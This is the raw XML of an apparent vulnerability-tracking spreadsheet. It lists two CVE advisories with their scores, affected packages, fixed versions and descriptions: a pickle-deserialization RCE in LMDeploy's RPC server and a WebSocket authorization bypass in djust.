    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S98" r:id="rId97"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S99" r:id="rId98"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S100" r:id="rId99"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S101" r:id="rId100"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S102" r:id="rId101"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S103" r:id="rId102"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S104" r:id="rId103"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S105" r:id="rId104"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S106" r:id="rId105"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S107" r:id="rId106"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S108" r:id="rId107"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S109" r:id="rId108"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S110" r:id="rId109"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S111" r:id="rId110"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S112" r:id="rId111"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S113" r:id="rId112"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S114" r:id="rId113"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S115" r:id="rId114"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S116" r:id="rId115"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S117" r:id="rId116"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S118" r:id="rId117"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S119" r:id="rId118"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S120" r:id="rId119"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S121" r:id="rId120"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S122" r:id="rId121"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S123" r:id="rId122"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S124" r:id="rId123"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S125" r:id="rId124"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S126" r:id="rId125"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S127" r:id="rId126"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S128" r:id="rId127"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S129" r:id="rId128"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S130" r:id="rId129"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S131" r:id="rId130"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S132" r:id="rId131"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S133" r:id="rId132"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S134" r:id="rId133"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S135" r:id="rId134"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S136" r:id="rId135"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S137" r:id="rId136"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S138" r:id="rId137"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S139" r:id="rId138"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S140" r:id="rId139"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S141" r:id="rId140"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S142" r:id="rId141"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S143" r:id="rId142"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S144" r:id="rId143"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S145" r:id="rId144"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S146" r:id="rId145"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S147" r:id="rId146"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S148" r:id="rId147"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S149" r:id="rId148"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S150" r:id="rId149"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S151" r:id="rId150"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S152" r:id="rId151"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S153" r:id="rId152"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S154" r:id="rId153"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S155" r:id="rId154"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S156" r:id="rId155"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S157" r:id="rId156"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S158" r:id="rId157"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S159" r:id="rId158"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S160" r:id="rId159"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S161" r:id="rId160"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S162" r:id="rId161"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S163" r:id="rId162"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S164" r:id="rId163"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S165" r:id="rId164"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S166" r:id="rId165"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S167" r:id="rId166"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S168" r:id="rId167"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S169" r:id="rId168"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S170" r:id="rId169"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S171" r:id="rId170"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S172" r:id="rId171"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S173" r:id="rId172"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S174" r:id="rId173"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S175" r:id="rId174"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S176" r:id="rId175"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S177" r:id="rId176"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S178" r:id="rId177"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S179" r:id="rId178"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S180" r:id="rId179"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S181" r:id="rId180"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S182" r:id="rId181"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S183" r:id="rId182"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S184" r:id="rId183"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S185" r:id="rId184"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S186" r:id="rId185"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S187" r:id="rId186"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S188" r:id="rId187"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S189" r:id="rId188"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S190" r:id="rId189"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S191" r:id="rId190"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S192" r:id="rId191"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S193" r:id="rId192"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S194" r:id="rId193"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S195" r:id="rId194"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S196" r:id="rId195"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S197" r:id="rId196"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S198" r:id="rId197"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S199" r:id="rId198"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S200" r:id="rId199"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S201" r:id="rId200"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S202" r:id="rId201"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S203" r:id="rId202"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S204" r:id="rId203"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S205" r:id="rId204"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S206" r:id="rId205"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S207" r:id="rId206"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S208" r:id="rId207"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S209" r:id="rId208"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S210" r:id="rId209"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S211" r:id="rId210"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S212" r:id="rId211"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S213" r:id="rId212"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S214" r:id="rId213"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S215" r:id="rId214"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S216" r:id="rId215"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S217" r:id="rId216"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S218" r:id="rId217"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S219" r:id="rId218"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S220" r:id="rId219"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S221" r:id="rId220"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S222" r:id="rId221"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S223" r:id="rId222"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S224" r:id="rId223"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S225" r:id="rId224"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S226" r:id="rId225"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S227" r:id="rId226"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S228" r:id="rId227"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S229" r:id="rId228"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S230" r:id="rId229"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S231" r:id="rId230"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S232" r:id="rId231"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S233" r:id="rId232"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S234" r:id="rId233"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S235" r:id="rId234"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S236" r:id="rId235"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S237" r:id="rId236"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S238" r:id="rId237"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S239" r:id="rId238"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S240" r:id="rId239"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S241" r:id="rId240"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S242" r:id="rId241"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S243" r:id="rId242"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S244" r:id="rId243"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S245" r:id="rId244"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S246" r:id="rId245"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S247" r:id="rId246"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S248" r:id="rId247"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S249" r:id="rId248"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S250" r:id="rId249"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S251" r:id="rId250"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S252" r:id="rId251"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S253" r:id="rId252"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S254" r:id="rId253"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S255" r:id="rId254"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S256" r:id="rId255"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S257" r:id="rId256"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S258" r:id="rId257"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S259" r:id="rId258"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S260" r:id="rId259"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S261" r:id="rId260"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S262" r:id="rId261"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S263" r:id="rId262"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S264" r:id="rId263"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S265" r:id="rId264"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S266" r:id="rId265"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S267" r:id="rId266"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S268" r:id="rId267"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S269" r:id="rId268"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S270" r:id="rId269"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S271" r:id="rId270"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S272" r:id="rId271"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S273" r:id="rId272"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S274" r:id="rId273"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S275" r:id="rId274"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S276" r:id="rId275"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S277" r:id="rId276"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S278" r:id="rId277"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S279" r:id="rId278"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S280" r:id="rId279"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S281" r:id="rId280"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S282" r:id="rId281"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S283" r:id="rId282"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S284" r:id="rId283"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S285" r:id="rId284"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S286" r:id="rId285"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S287" r:id="rId286"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S288" r:id="rId287"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S289" r:id="rId288"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S290" r:id="rId289"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S291" r:id="rId290"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S292" r:id="rId291"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S293" r:id="rId292"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S294" r:id="rId293"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S295" r:id="rId294"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S296" r:id="rId295"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S297" r:id="rId296"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S298" r:id="rId297"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S299" r:id="rId298"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S300" r:id="rId299"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S301" r:id="rId300"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S302" r:id="rId301"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S303" r:id="rId302"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S304" r:id="rId303"/>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7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18" customWidth="1" min="3" max="3"/>
    <col width="7" customWidth="1" min="4" max="4"/>
    <col width="10" customWidth="1" min="5" max="5"/>
    <col width="10" customWidth="1" min="6" max="6"/>
    <col width="6" customWidth="1" min="7" max="7"/>
    <col width="7" customWidth="1" min="8" max="8"/>
    <col width="9" customWidth="1" min="9" max="9"/>
    <col width="16" customWidth="1" min="10" max="10"/>
    <col width="28" customWidth="1" min="11" max="11"/>
    <col width="28" customWidth="1" min="12" max="12"/>
    <col width="14" customWidth="1" min="13" max="13"/>
    <col width="18" customWidth="1" min="14" max="14"/>
    <col width="12" customWidth="1" min="15" max="15"/>
    <col width="11" customWidth="1" min="16" max="16"/>
    <col width="12" customWidth="1" min="17" max="17"/>
    <col width="90" customWidth="1" min="18" max="18"/>
    <col width="42" customWidth="1" min="19" max="19"/>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KEV Due</t>
        </is>
      </c>
      <c r="Q1" s="4" t="inlineStr">
        <is>
          <t>CWE</t>
        </is>
      </c>
      <c r="R1" s="4" t="inlineStr">
        <is>
          <t>Description</t>
        </is>
      </c>
      <c r="S1" s="4" t="inlineStr">
        <is>
          <t>Link</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B2" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-59953</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>pip:lmdeploy</t>
        </is>
      </c>
      <c r="M2" s="5" t="inlineStr">
        <is>
          <t>0.10.2</t>
        </is>
      </c>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr"/>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>LMDeploy is a toolkit for compressing, deploying, and serving large language models. Starting in version 0.9.1 and prior to version 0.10.2, the LMdeploy implements an rpc server (AsyncRPCServer in zmq_rpc.py) for supporting the RPC communications. In its core functionality call_and_response(), I found it will directly use the pickles.loads() to deserialize the received messages without any sanitization, hence resulting in a remote code execution vulnerability by this RPC server. Version 0.10.2 contains a patch.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-59953</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61594</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M3" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr"/>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the live (WebSocket) transport authorizes a mount via `check_view_auth`, not Django's `View.dispatch()` chain. As a result, standard Django authorization — `LoginRequiredMixin`, `PermissionRequiredMixin`, `UserPassesTestMixin`, `@method_decorator(login_required, name="dispatch")`, and custom `dispatch()` guards — and the djust admin extension's staff gate (applied only in the HTTP `as_view` wrapper) were enforced on the initial HTTP GET but silently bypassed over WebSocket, where all events and state flow. An anonymous or under-privileged client could open a WebSocket and mount such a view — including admin list/create/change/delete — and dispatch its handlers. This is fixed in djust 1.0.7. `check_view_auth` now honors the Django `AccessMixin` family on every transport; a new system check S004 fails loud at startup on auth patterns the runtime cannot safely replay (decorator/overridden-`dispatch` forms); and the admin base mixin declares `login_required = True` + an active-staff `check_permissions` gate. As a workaround, gate views using djust's `login_required` / `permission_required` / `check_permissions` attributes (honored on all transports) rather than HTTP-only mixins/decorators.</t>
